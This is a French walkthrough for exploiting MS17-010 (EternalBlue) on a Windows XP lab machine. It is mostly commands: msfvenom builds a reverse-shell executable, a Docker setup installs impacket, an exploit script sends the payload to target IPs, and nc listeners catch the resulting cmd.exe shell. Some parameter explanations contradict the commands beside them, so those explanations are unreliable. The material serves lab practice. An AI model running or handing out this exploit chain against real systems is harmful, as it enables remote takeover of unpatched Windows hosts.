
MS17-010_CVE-2017-0143
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143
Utilisation de msfvenom pour générer un payload :
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
-p windows/shell_reverse_tcp: Spécifie le payload (un shell inverse TCP pour Windows).LHOST=10.10.14.4: L'adresse IP de l'attaquant (là où la cible se connectera en retour).LPORT=443: Le port sur la machine de l'attaquant pour écouter la connexion.-f exe: Génère le payload sous forme de fichier exécutable.-a x86: Spécifie l'architecture (32 bits).-o rev.exe: Enregistre le payload sous le nom rev.exe.Mise en place d'un conteneur Docker :
Étapes pour configurer Docker :
sudo apt-get install docker.io
Créer une structure de dossiers :
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
Dockerfile: Contient les instructions pour construire le conteneur Docker.requirements.txt: Liste les dépendances Python (par exemple, impacket).Écrire le Dockerfile :
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
FROM python:2.7-alpine: Utilise une image Alpine Linux légère avec Python 2.7.RUN apk --update --no-cache add: Installe les dépendances nécessaires (par exemple, git, gcc).COPY rev.exe /opt/cattime: Copie l'exécutable du shell inverse (rev.exe) dans le conteneur.RUN pip install -r requirements.txt: Installe les dépendances Python (par exemple, impacket).Construire le conteneur Docker :
sudo docker build -t exploit .
Exécuter le conteneur :
sudo docker run -it exploit /bin/sh
Téléchargement et exécution de l'exploit :
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143
python send_and_execute.py 10.10.10.4 ../ms17-010.exe
Shell inverse :
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe
créez un listener nc
nc -nlvp 1337
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

Si vous obtenez une erreur comme celle-ci, suivez ces étapes :
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket
Maintenant, nous pouvons exécuter l'exploit :


Cet exploit est écrit en python2 et nécessite certaines bibliothèques comme impacket et pycrypto. Pour cela, un environnement virtuel doit être configuré, et c'est là que le programme virtualenv aide. Une fois l'environnement créé, vous pouvez l'activer à l'aide de l'utilitaire source. Ici, python2 est utilisé comme interpréteur car dans les dernières versions de Kali, python3 est défini comme interpréteur global et notre exploit est en python2.
Pourquoi utiliser un environnement virtuel ? Pour cela, vous pouvez consulter ceci : https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto


python checker.py 10.10.10.4

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

python send_and_execute.py 10.10.10.4 shell.exe 445 browser

nc -nlvp 4445
